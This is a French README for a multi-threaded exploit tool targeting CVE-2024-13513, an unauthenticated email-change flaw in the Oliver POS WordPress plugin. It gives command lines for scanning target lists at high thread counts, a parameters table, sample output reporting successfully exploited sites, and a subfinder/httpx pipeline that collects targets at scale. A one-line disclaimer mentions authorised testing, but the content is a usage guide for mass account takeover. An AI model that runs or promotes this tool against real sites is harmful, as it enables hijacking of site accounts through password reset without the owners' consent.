
Exploit multi-threadé pour CVE-2024-13513 ciblant le changement d'email non authentifié dans le plugin Oliver POS. Scanne des listes d'URLs, détecte les versions vulnérables et effectue l'exploitation avec journalisation des sorties.
python3 exploit.py -l targets.txt -e [email protected]
python3 exploit.py \
-l targets.txt \
-e [email protected] \
-t 100 \
-o /path/to/results
| Paramètre | Description | Requis | Défaut |
|---|---|---|---|
-l, --list | Chemin vers le fichier contenant les URLs cibles | ✅ Oui | - |
-e, --email | Adresse e-mail pour la réinitialisation du mot de passe | ✅ Oui | - |
-t, --threads | Nombre de threads simultanés | ❌ Non | 50 |
-o, --output | Répertoire de sortie pour les résultats | ❌ Non | Répertoire actuel |
Créez un fichier texte (targets.txt) avec une URL par ligne :
example.com
https://site1.com
http://site2.com
http://192.168.1.100/wordpress
https://vulnerable-site.org/blog
L'outil génère plusieurs fichiers de sortie :
vulnerable_targets.txt - Tous les sites web vulnérables détectéssuccessfully_exploited.txt - Cibles exploitées avec succès avec e-mailpython3 exploit.py -l my_targets.txt -e [email protected] -t 80
[ INFO ] 150 cibles uniques chargées
[ INFO ] Utilisation de l'e-mail : [email protected]
[ INFO ] Threads : 80
[ INFO ] Démarrage du scan...
[ CHECKING ] http://example.com/
[ VULNERABLE ] http://example.com/
[ SUCCESS ] E-mail modifié avec succès : http://example.com/
[ NOT FOUND ] http://site2.com/
[ PATCHED ] http://site3.com/
[ INFO ] Temps d'exécution : 45.23 secondes
python3 exploit.py -l urls.txt -e [email protected] -t 200
python3 exploit.py -l targets.txt -e [email protected] -o ./scan_results
# Use with subfinder and httpx
subfinder -d example.com | httpx -silent | tee targets.txt
python3 exploit.py -l targets.txt -e [email protected] -t 100
⚠️ Cet outil est destiné uniquement à des fins éducatives et de tests d'intrusion autorisés.
Problèmes courants :
# File not found
[ ERROR ] File not found: targets.txt
# Invalid email format
[ ERROR ] Invalid email format
# Network issues
[ CONN ERROR ] example.com
[ TIMEOUT ] example.com
Solutions :
Cet outil offre des capacités complètes de scan et d'exploitation pour les professionnels de la sécurité menant des évaluations de vulnérabilité autorisées.